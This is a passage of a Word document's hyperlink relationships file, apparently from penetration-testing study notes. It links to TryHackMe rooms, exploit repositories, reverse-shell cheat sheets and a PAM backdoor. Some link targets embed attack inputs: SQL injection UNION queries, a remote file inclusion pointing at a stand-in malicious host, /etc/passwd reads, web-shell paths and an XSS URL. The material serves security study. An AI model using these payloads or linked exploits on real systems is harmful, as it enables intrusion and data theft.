Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/Sq00ky/Dumping-Router-Firmware-Image/tree/master" TargetMode="External"/><Relationship Id="rId188" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/RUB-NDS/PRET" TargetMode="External"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/rebootuser/LinEnum" TargetMode="External"/><Relationship Id="rId71" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.owasp.org/index.php/XSS_Filter_Evasion_Cheat_Sheet" TargetMode="External"/><Relationship Id="rId92" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://www.pentest-standard.org/index.php/Post_Exploitation" TargetMode="External"/><Relationship Id="rId162" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.bc-security.org/post/reflective-pe-injection-in-windows-10-1909/" TargetMode="External"/><Relationship Id="rId183" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-nrpc/76c93227-942a-4687-ab9d-9d972ffabdab" TargetMode="External"/><Relationship Id="rId213" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://dehashed.com/" TargetMode="External"/><Relationship Id="rId218" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.youtube.com/watch?v=p8wbebEgtDk" TargetMode="External"/><Relationship Id="rId234" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://10.10.36.177:5601/status" TargetMode="External"/><Relationship Id="rId239" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.zerodayinitiative.com/blog/2019/11/19/thanksgiving-treat-easy-as-pie-windows-7-secure-desktop-escalation-of-privilege" TargetMode="External"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/styles" Target="styles.xml"/><Relationship Id="rId29" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://example.com" TargetMode="External"/><Relationship Id="rId250" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://sqliteonline.com/" TargetMode="External"/><Relationship Id="rId255" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.youtube.com/watch?v=eGz9DS-aIeY" TargetMode="External"/><Relationship Id="rId24" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://tryhackme.com/room/blog" TargetMode="External"/><Relationship Id="rId40" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/sqlmapproject/sqlmap" TargetMode="External"/><Relationship Id="rId45" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://tryhackme.com/room/jurassicpark" TargetMode="External"/><Relationship Id="rId66" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://example.com/app/admin_getappInfo" TargetMode="External"/><Relationship Id="rId87" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.sans.org/cyber-security-summit/archives/file/summit-archive-1493862736.pdf" TargetMode="External"/><Relationship Id="rId110" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://ip/shell.php" TargetMode="External"/><Relationship Id="rId115" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://example.com/example.php?file=http://www.malicious-example.com/malicious.php" TargetMode="External"/><Relationship Id="rId131" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/saleemrashid/sudo-cve-2019-18634" TargetMode="External"/><Relationship Id="rId136" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-3493" TargetMode="External"/><Relationship Id="rId157" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://cybernullius.free.beeceptor.com" TargetMode="External"/><Relationship Id="rId178" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-nrpc/3a9ed16f-8014-45ae-80af-c0ecb06e2db9" TargetMode="External"/><Relationship Id="rId61" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://vulnerable/" TargetMode="External"/><Relationship Id="rId82" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://ired.team/offensive-security-experiments/active-directory-kerberos-abuse/as-rep-roasting-using-rubeus-and-hashcat" TargetMode="External"/><Relationship Id="rId152" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/fcsonline/autocsp" TargetMode="External"/><Relationship Id="rId173" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://localhost:8081" TargetMode="External"/><Relationship Id="rId194" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://docker-rodeo.thm:5000/v2/cmnatic/myapp1/manifests/notsecure" TargetMode="External"/><Relationship Id="rId199" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://blog.trailofbits.com/2019/07/19/understanding-docker-container-escapes/" TargetMode="External"/><Relationship Id="rId203" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://docs.google.com/presentation/d/1WdByuxWgayPb-RstO-XaENSqVPGP7h6t3GS6W4jk4tk/htmlpresent" TargetMode="External"/><Relationship Id="rId208" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.theosintion.com/" TargetMode="External"/><Relationship Id="rId229" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://docs.aws.amazon.com/cli/latest/userguide/cli-chap-configure.html" TargetMode="External"/><Relationship Id="rId19" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://cirt.net/nikto2-docs/installation.html" TargetMode="External"/><Relationship Id="rId224" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://code.kryo.se/iodine/" TargetMode="External"/><Relationship Id="rId240" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/Kahvi-0/Writeups/blob/master/TryHackMe/Skynet.md" TargetMode="External"/><Relationship Id="rId245" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="mailto:agent47@10.10.192.4" TargetMode="External"/><Relationship Id="rId261" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://tryhackme.com/room/httpindetail" TargetMode="External"/><Relationship Id="rId266" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.unifiedkillchain.com/" TargetMode="External"/><Relationship Id="rId14" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://sansorg.egnyte.com/dl/bF4I3yCcnt/" TargetMode="External"/><Relationship Id="rId30" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://shibes.thm/login.php" TargetMode="External"/><Relationship Id="rId35" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.khanacademy.org/computing/computer-programming/sql" TargetMode="External"/><Relationship Id="rId56" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://vulnerable/cat.php?id=1%20UNION%20SELECT%201,@@version,3,4" TargetMode="External"/><Relationship Id="rId77" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://jewel.uploadvulns.thm" TargetMode="External"/><Relationship Id="rId100" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://gist.github.com/mzfr/fd9959bea8e7965d851871d09374bb72" TargetMode="External"/><Relationship Id="rId105" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image3.JPG"/><Relationship Id="rId126" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="file:///\\n" TargetMode="External"/><Relationship Id="rId147" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://content-security-policy.com/" TargetMode="External"/><Relationship Id="rId168" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/ReFirmLabs/binwalk/blob/master/INSTALL.md" TargetMode="External"/><Relationship Id="rId8" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/diego-treitos/linux-smart-enumeration/blob/master/lse.sh" TargetMode="External"/><Relationship Id="rId51" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://pentestmonkey.net/cheat-sheet/sql-injection/mssql-sql-injection-cheat-sheet" TargetMode="External"/><Relationship Id="rId72" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/XSS%20Injection" TargetMode="External"/><Relationship Id="rId93" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://offsec.red/mimikatz-cheat-sheet/" TargetMode="External"/><Relationship Id="rId98" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://127.0.0.1:3306" TargetMode="External"/><Relationship Id="rId121" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://janakiev.com/blog/python-shell-commands/" TargetMode="External"/><Relationship Id="rId142" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://pentestmonkey.net/cheat-sheet/shells/reverse-shell-cheat-sheet" TargetMode="External"/><Relationship Id="rId163" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.bc-security.org/post/i-think-you-have-the-wrong-number-using-errant-callbacks-to-enumerate-and-evade-outlook-s-sandbox/" TargetMode="External"/><Relationship Id="rId184" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-nrpc/d55e2632-7163-4f6c-b662-4b870e8cc1cd" TargetMode="External"/><Relationship Id="rId189" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://hacking-printers.net/wiki/index.php/Printer_Security_Testing_Cheat_Sheet" TargetMode="External"/><Relationship Id="rId219" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.cloudflare.com/learning/dns/glossary/dns-root-server/" TargetMode="External"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/settings" Target="settings.xml"/><Relationship Id="rId214" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://wpscan.com/wordpress-security-scanner" TargetMode="External"/><Relationship Id="rId230" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://arstechnica.com/information-technology/2017/05/defense-contractor-stored-intelligence-data-in-amazon-cloud-unprotected/" TargetMode="External"/><Relationship Id="rId235" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/mpgn/CVE-2018-17246" TargetMode="External"/><Relationship Id="rId251" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/hack3rman/TryHackMe/blob/master/db-blind.py" TargetMode="External"/><Relationship Id="rId256" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://book.hacktricks.xyz/pentesting/2375-pentesting-docker" TargetMode="External"/><Relationship Id="rId25" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://tryhackme.com/room/rpwebscanning" TargetMode="External"/><Relationship Id="rId46" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://tryhackme.com/room/ccpentesting" TargetMode="External"/><Relationship Id="rId67" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://example.com/search?keyword=%3cscript%3e...%3c/script" TargetMode="External"/><Relationship Id="rId116" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/cyberheartmi9/PayloadsAllTheThings/tree/master/File%20Inclusion%20-%20Path%20Traversal" TargetMode="External"/><Relationship Id="rId137" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://ssd-disclosure.com/ssd-advisory-overlayfs-pe/" TargetMode="External"/><Relationship Id="rId158" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://pentest-tools.com/blog/xss-attacks-practical-scenarios/" TargetMode="External"/><Relationship Id="rId20" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/sullo/nikto/wiki/Plugin-list" TargetMode="External"/><Relationship Id="rId41" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.security-sleuth.com/sleuth-blog/2017/1/3/sqlmap-cheat-sheet" TargetMode="External"/><Relationship Id="rId62" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://vulnerable/" TargetMode="External"/><Relationship Id="rId83" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://posts.specterops.io/kerberoasting-revisited-d434351bd4d1" TargetMode="External"/><Relationship Id="rId88" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.redsiege.com/wp-content/uploads/2020/04/20200430-kerb101.pdf" TargetMode="External"/><Relationship Id="rId111" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://ip/directory/shell.php" TargetMode="External"/><Relationship Id="rId132" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://ssd-disclosure.com/ssd-advisory-overlayfs-pe/" TargetMode="External"/><Relationship Id="rId153" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://csp-evaluator.withgoogle.com/" TargetMode="External"/><Relationship Id="rId174" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://localhost:8081/boardDataWW.php" TargetMode="External"/><Relationship Id="rId179" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://raw.githubusercontent.com/SecuraBV/CVE-2020-1472/master/zerologon_tester.py" TargetMode="External"/><Relationship Id="rId195" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/wagoodman/dive" TargetMode="External"/><Relationship Id="rId209" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://yandex.com/images/" TargetMode="External"/><Relationship Id="rId190" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://docs.docker.com/registry/spec/api/" TargetMode="External"/><Relationship Id="rId204" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nixintel.info/osint/12-osint-resources-for-e-mail-addresses/" TargetMode="External"/><Relationship Id="rId220" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.cloudflare.com/learning/dns/glossary/dns-root-server/" TargetMode="External"/><Relationship Id="rId225" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://medium.com/@alex.birsan/dependency-confusion-4a5d60fec610" TargetMode="External"/><Relationship Id="rId241" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://blog.tryhackme.com/skynet-writeup/" TargetMode="External"/><Relationship Id="rId246" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.notion.so/GAMEZONE-WRITE-UP-2e762633c6234e3b9e1fbb0bcf743fcb" TargetMode="External"/><Relationship Id="rId267" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/fontTable" Target="fontTable.xml"/><Relationship Id="rId15" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/OJ/gobuster" TargetMode="External"/><Relationship Id="rId36" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/stamparm/DSSS" TargetMode="External"/><Relationship Id="rId57" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://vulnerable/cat.php?id=1%20UNION%20SELECT%201,current_user(),3,4" TargetMode="External"/><Relationship Id="rId106" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image4.JPG"/><Relationship Id="rId127" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="file:///etc/passwd" TargetMode="External"/><Relationship Id="rId262" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://crt.sh/" TargetMode="External"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://gtfobins.github.io/" TargetMode="External"/><Relationship Id="rId31" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://shibes.xyz/api.php?breed=FUZZ" TargetMode="External"/><Relationship Id="rId52" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/trietptm/SQL-Injection-Payloads" TargetMode="External"/><Relationship Id="rId73" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/payloadbox/xss-payload-list" TargetMode="External"/><Relationship Id="rId78" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://jewel.uploadvulns.thm/%3cdirectory" TargetMode="External"/><Relationship Id="rId94" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://gist.github.com/HarmJ0y/184f9822b195c52dd50c379ed3117993" TargetMode="External"/><Relationship Id="rId99" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://[::]:3306" TargetMode="External"/><Relationship Id="rId101" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="file:///\\etc\passwd" TargetMode="External"/><Relationship Id="rId122" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/swisskyrepo/PayloadsAllTheThings" TargetMode="External"/><Relationship Id="rId143" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image6.PNG"/><Relationship Id="rId148" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://report-uri.com/home/generate" TargetMode="External"/><Relationship Id="rId164" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://tryhackme.com/room/rppsempire" TargetMode="External"/><Relationship Id="rId169" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://ubuntuforums.org/archive/index.php/t-846852.html" TargetMode="External"/><Relationship Id="rId185" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/SecureAuthCorp/impacket/blob/master/impacket/dcerpc/v5/nrpc.py" TargetMode="External"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/webSettings" Target="webSettings.xml"/><Relationship Id="rId9" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/mzet-/linux-exploit-suggester" TargetMode="External"/><Relationship Id="rId180" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-nrpc/14b020a8-0bcf-4af5-ab72-cc92bc6b1d81" TargetMode="External"/><Relationship Id="rId210" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://tineye.com/" TargetMode="External"/><Relationship Id="rId215" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://digi.ninja/projects/cewl.php" TargetMode="External"/><Relationship Id="rId236" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://10.10.36.177:8000/kibana-log.txt" TargetMode="External"/><Relationship Id="rId257" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.tecmint.com/create-ssh-tunneling-port-forwarding-in-linux/" TargetMode="External"/><Relationship Id="rId26" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://tryhackme.com/room/owasptop10" TargetMode="External"/><Relationship Id="rId231" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.infosecurity-magazine.com/news/accenture-leaked-data-another-aws/" TargetMode="External"/><Relationship Id="rId252" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/hack3rman/TryHackMe/blob/master/Daily%20Bugle.md" TargetMode="External"/><Relationship Id="rId47" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology%20and%20Resources/Reverse%20Shell%20Cheatsheet.md" TargetMode="External"/><Relationship Id="rId68" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/aabeling/portscan" TargetMode="External"/><Relationship Id="rId89" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://blog.harmj0y.net/" TargetMode="External"/><Relationship Id="rId112" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://0x90909090.blogspot.com/2016/06/creating-backdoor-in-pam-in-5-line-of.html" TargetMode="External"/><Relationship Id="rId133" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://ssd-disclosure.com/ssd-advisory-overlayfs-pe/" TargetMode="External"/><Relationship Id="rId154" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/zigoo0/JSONBee" TargetMode="External"/><Relationship Id="rId175" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://localhost:8081/passwd" TargetMode="External"/><Relationship Id="rId196" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://raw.githubusercontent.com/sangam14/dockercheatsheets/master/dockercheatsheet8.png" TargetMode="External"/><Relationship Id="rId200" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/dirtycow/dirtycow.github.io" TargetMode="External"/><Relationship Id="rId16" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/OJ/gobuster" TargetMode="External"/><Relationship Id="rId221" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.cloudflare.com/learning/dns/glossary/dns-zone/" TargetMode="External"/><Relationship Id="rId242" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.youtube.com/watch?v=HXikLrFVIXc&amp;t=2416s" TargetMode="External"/><Relationship Id="rId263" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://transparencyreport.google.com/https/certificates" TargetMode="External"/><Relationship Id="rId37" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://suip.biz/?act=sqlmap" TargetMode="External"/><Relationship Id="rId58" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://vulnerable/cat.php?id=1%20UNION%20SELECT%201,database(),3,4" TargetMode="External"/><Relationship Id="rId79" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/GhostPack/Rubeus" TargetMode="External"/><Relationship Id="rId102" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/Server%20Side%20Request%20Forgery" TargetMode="External"/><Relationship Id="rId123" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/Server%20Side%20Template%20Injection" TargetMode="External"/><Relationship Id="rId144" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.owasp.org/index.php/Command_Injection" TargetMode="External"/><Relationship Id="rId90" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://adsecurity.org/?page_id=1821" TargetMode="External"/><Relationship Id="rId165" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://tryhackme.com/room/zer0logon" TargetMode="External"/><Relationship Id="rId186" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://raw.githubusercontent.com/Sq00ky/Zero-Logon-Exploit/master/zeroLogon-NullPass.py" TargetMode="External"/><Relationship Id="rId211" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://haveibeenpwned.com/" TargetMode="External"/><Relationship Id="rId232" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.infosecurity-magazine.com/news/data-leak-exposes-750k-birth-cert/" TargetMode="External"/><Relationship Id="rId253" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.hackingarticles.in/joomla-reverse-shell/" TargetMode="External"/><Relationship Id="rId27" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://tryhackme.com/room/toolsrus" TargetMode="External"/><Relationship Id="rId48" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/payloadbox/sql-injection-payload-list" TargetMode="External"/><Relationship Id="rId69" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://blog.tryhackme.com/setting-up-burp/" TargetMode="External"/><Relationship Id="rId113" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/zephrax/linux-pam-backdoor" TargetMode="External"/><Relationship Id="rId134" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://yagrebu.net/unix/rpi-overlay.md" TargetMode="External"/><Relationship Id="rId80" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="mailto:-2-0-40e10000-Administrator@krbtgt-CONTROLLER.LOCAL.kirbi" TargetMode="External"/><Relationship Id="rId155" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://beeceptor.com/" TargetMode="External"/><Relationship Id="rId176" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/SecuraBV/CVE-2020-1472" TargetMode="External"/><Relationship Id="rId197" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://registry.hub.docker.com/r/chrisfosterelli/rootplease" TargetMode="External"/><Relationship Id="rId201" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://unit42.paloaltonetworks.com/breaking-docker-via-runc-explaining-cve-2019-5736/" TargetMode="External"/><Relationship Id="rId222" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.iana.org/domains/root/servers" TargetMode="External"/><Relationship Id="rId243" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.hackingarticles.in/command-shell-to-meterpreter/" TargetMode="External"/><Relationship Id="rId264" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/aboul3la/Sublist3r" TargetMode="External"/><Relationship Id="rId17" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/danielmiessler/SecLists" TargetMode="External"/><Relationship Id="rId38" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/payloadbox/sql-injection-payload-list" TargetMode="External"/><Relationship Id="rId59" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://vulnerable/" TargetMode="External"/><Relationship Id="rId103" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image1.JPG"/><Relationship Id="rId124" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://hackerone.com/reports/125980" TargetMode="External"/><Relationship Id="rId70" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://portswigger.net/web-security/cross-site-scripting/cheat-sheet" TargetMode="External"/><Relationship Id="rId91" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://metasploit.help.rapid7.com/docs/about-post-exploitation" TargetMode="External"/><Relationship Id="rId145" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.owasp.org/index.php/Path_Traversal" TargetMode="External"/><Relationship Id="rId166" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://tryhackme.com/room/blue" TargetMode="External"/><Relationship Id="rId187" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.variot.eu/" TargetMode="External"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/numbering" Target="numbering.xml"/><Relationship Id="rId212" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://scylla.sh/" TargetMode="External"/><Relationship Id="rId233" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.elastic.co/guide/en/elasticsearch/reference/current/search-search.html" TargetMode="External"/><Relationship Id="rId254" 